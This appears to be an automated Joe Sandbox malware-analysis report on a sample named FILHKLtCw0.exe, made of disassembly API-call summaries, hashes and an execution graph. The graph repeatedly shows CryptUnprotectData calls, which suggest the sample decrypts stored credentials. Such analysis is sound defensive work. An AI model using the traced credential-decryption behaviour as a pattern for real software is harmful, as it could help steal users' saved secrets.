                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID: Call
                                                                                                              • API String ID: 3677997916-1824292864
                                                                                                              • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                              • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                              • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                              • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 2659869361-823278215
                                                                                                              • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                              • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                              • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                              • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                              APIs
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 3585118688-0
                                                                                                              • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                              • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                              • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                              • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                              • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 2102729457-0
                                                                                                              • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                              • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                              • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                              • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 00405AC2
                                                                                                                • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                              • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 00405B6A
                                                                                                              • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 3248276644-823278215
                                                                                                              • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                              • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                              • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                              • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                              • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 00405748
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                              • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                              • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                              • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$GlobalLibrary
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 1100898210-823278215
                                                                                                              • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                              • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                              • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                              • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FILHKLtCw0.exe,C:\Users\user\Desktop\FILHKLtCw0.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FILHKLtCw0.exe,C:\Users\user\Desktop\FILHKLtCw0.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharPrevlstrlen
                                                                                                              • String ID: C:\Users\user\Desktop
                                                                                                              • API String ID: 2709904686-1246513382
                                                                                                              • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                              • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                              • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                              • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                              • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                              • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                              • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                              • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                              • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                              • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.9%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:2.6%
                                                                                                              Total number of Nodes:234
                                                                                                              Total number of Limit Nodes:15
                                                                                                              execution_graph 44361 39402020 SetTimer 44362 3940208c 44361->44362 44363 394020c0 44366 394020ed 44363->44366 44364 3940213c 44364->44364 44366->44364 44367 394018ac 44366->44367 44368 394018b7 44367->44368 44373 39401874 44368->44373 44370 3940229c 44377 38ed962c 44370->44377 44371 394022a5 44371->44364 44374 3940187f 44373->44374 44381 394018cc 44374->44381 44376 394022f5 44376->44370 44378 38ed9637 44377->44378 44380 38edf04f 44378->44380 44385 38edebd4 44378->44385 44380->44371 44382 394018d7 44381->44382 44383 39402461 GetCurrentThreadId 44382->44383 44384 3940248b 44382->44384 44383->44384 44384->44376 44387 38edebdf 44385->44387 44386 38edf119 44386->44380 44387->44386 44390 38edfaa8 44387->44390 44394 38edfab8 44387->44394 44391 38edfab8 44390->44391 44392 38edfb92 44391->44392 44398 394000c0 44391->44398 44395 38edfae3 44394->44395 44396 38edfb92 44395->44396 44397 394000c0 2 API calls 44395->44397 44397->44396 44402 39400110 44398->44402 44406 39400104 44398->44406 44403 3940014e CreateWindowExW 44402->44403 44405 39400234 44403->44405 44407 3940010a CreateWindowExW 44406->44407 44409 39400234 44407->44409 44409->44409 44410 11b158 44411 11b174 44410->44411 44417 38380198 44411->44417 44421 38380188 44411->44421 44412 11b1a3 44425 39402730 44412->44425 44418 383801a4 44417->44418 44431 3838c638 44418->44431 44419 383801da 44419->44412 44422 38380198 44421->44422 44424 3838c638 CryptUnprotectData 44422->44424 44423 383801da 44423->44412 44424->44423 44426 3940273f 44425->44426 44463 39400938 44426->44463 44433 3838c66a 44431->44433 44432 3838caf9 44432->44419 44433->44432 44435 3838cf01 44433->44435 44436 3838cf10 44435->44436 44440 3838d550 44436->44440 44448 3838d540 44436->44448 44437 3838cf80 44437->44433 44441 3838d575 44440->44441 44444 3838d629 44440->44444 44441->44444 44445 3838d550 CryptUnprotectData 44441->44445 44446 3838d540 CryptUnprotectData 44441->44446 44456 3838d730 44441->44456 44460 3838d1ec 44444->44460 44445->44444 44446->44444 44449 3838d550 44448->44449 44450 3838d629 44449->44450 44453 3838d550 CryptUnprotectData 44449->44453 44454 3838d540 CryptUnprotectData 44449->44454 44455 3838d730 CryptUnprotectData 44449->44455 44451 3838d1ec CryptUnprotectData 44450->44451 44452 3838d7f5 44451->44452 44452->44437 44453->44450 44454->44450 44455->44450 44457 3838d745 44456->44457 44458 3838d1ec CryptUnprotectData 44457->44458 44459 3838d7f5 44458->44459 44459->44444 44461 3838d9e0 CryptUnprotectData 44460->44461 44462 3838d7f5 44461->44462 44462->44437 44464 39400948 44463->44464 44465 39400965 44464->44465 44471 39400980 44464->44471 44467 3940193c 44465->44467 44468 39401947 44467->44468 44494 394019e4 44468->44494 44470 39402825 44470->44470 44472 394009c6 GetCurrentProcess 44471->44472 44474 39400a11 44472->44474 44475 39400a18 GetCurrentThread 44472->44475 44474->44475 44476 39400a55 GetCurrentProcess 44475->44476 44477 39400a4e 44475->44477 44478 39400a8b 44476->44478 44477->44476 44483 39400f31 44478->44483 44485 39400b51 44478->44485 44479 39400ab3 GetCurrentThreadId 44480 39400ae4 44479->44480 44480->44465 44484 39400f4e 44483->44484 44484->44479 44489 39400bc1 44485->44489 44492 39400bc8 DuplicateHandle 44485->44492 44486 39400b8e 44486->44479 44490 39400bc8 DuplicateHandle 44489->44490 44491 39400c5e 44490->44491 44491->44486 44493 39400c5e 44492->44493 44493->44486 44499 394019ef 44494->44499 44495 39402e79 44496 39402ea9 44495->44496 44497 39402b7c 7 API calls 44495->44497 44501 39402ed4 44496->44501 44509 39402b7c 44496->44509 44497->44496 44499->44495 44499->44501 44505 39404248 44499->44505 44500 39402ec1 44500->44501 44515 3940d6e8 44500->44515 44521 3940d6d8 44500->44521 44501->44470 44506 39404269 44505->44506 44507 3940428d 44506->44507 44527 394043f8 44506->44527 44507->44495 44510 39402b87 44509->44510 44511 39400938 6 API calls 44510->44511 44514 3940d181 44510->44514 44512 3940d19b 44511->44512 44560 3940c5fc 44512->44560 44514->44500 44520 3940d74d 44515->44520 44516 3940d979 44517 39400938 6 API calls 44516->44517 44518 3940d79a 44517->44518 44518->44501 44520->44516 44520->44518 44567 3940c6c4 44520->44567 44526 3940d6d4 44521->44526 44522 3940d979 44523 39400938 6 API calls 44522->44523 44524 3940d79a 44523->44524 44524->44501 44525 3940c6c4 DispatchMessageW 44525->44526 44526->44521 44526->44522 44526->44524 44526->44525 44528 39404405 44527->44528 44529 39400938 6 API calls 44528->44529 44530 39404433 44529->44530 44531 3940443e 44530->44531 44533 394035a8 44530->44533 44531->44507 44535 394035b3 44533->44535 44534 394044b0 44535->44534 44537 394035dc 44535->44537 44538 394035e7 44537->44538 44544 394035ec 44538->44544 44540 3940451f 44548 39409412 44540->44548 44554 39409420 44540->44554 44541 39404559 44541->44534 44545 394035f7 44544->44545 44546 394056c0 44545->44546 44547 39404248 8 API calls 44545->44547 44546->44540 44547->44546 44549 394093bf 44548->44549 44550 3940941a 44548->44550 44551 3940945d 44550->44551 44552 38edfaa8 2 API calls 44550->44552 44553 38edfab8 2 API calls 44550->44553 44551->44541 44552->44551 44553->44551 44556 39409451 44554->44556 44557 39409551 44554->44557 44555 3940945d 44555->44541 44556->44555 44558 38edfaa8 2 API calls 44556->44558 44559 38edfab8 2 API calls 44556->44559 44557->44541 44558->44557 44559->44557 44561 3940c607 44560->44561 44562 3940d49b 44561->44562 44564 3940c618 44561->44564 44562->44514 44565 3940d4d0 OleInitialize 44564->44565 44566 3940d534 44565->44566 44566->44562 44568 3940e7b0 DispatchMessageW 44567->44568 44569 3940e81c 44568->44569 44569->44520 44582 ad030 44583 ad048 44582->44583 44584 ad0a2 44583->44584 44589 394003f0 44583->44589 44592 394002c8 44583->44592 44597 39401bc1 44583->44597 44607 39401bd0 44583->44607 44590 39400407 44589->44590 44617 39400840 44589->44617 44590->44584 44593 394002ee 44592->44593 44595 39401bd0 2 API calls 44593->44595 44596 39401bc1 2 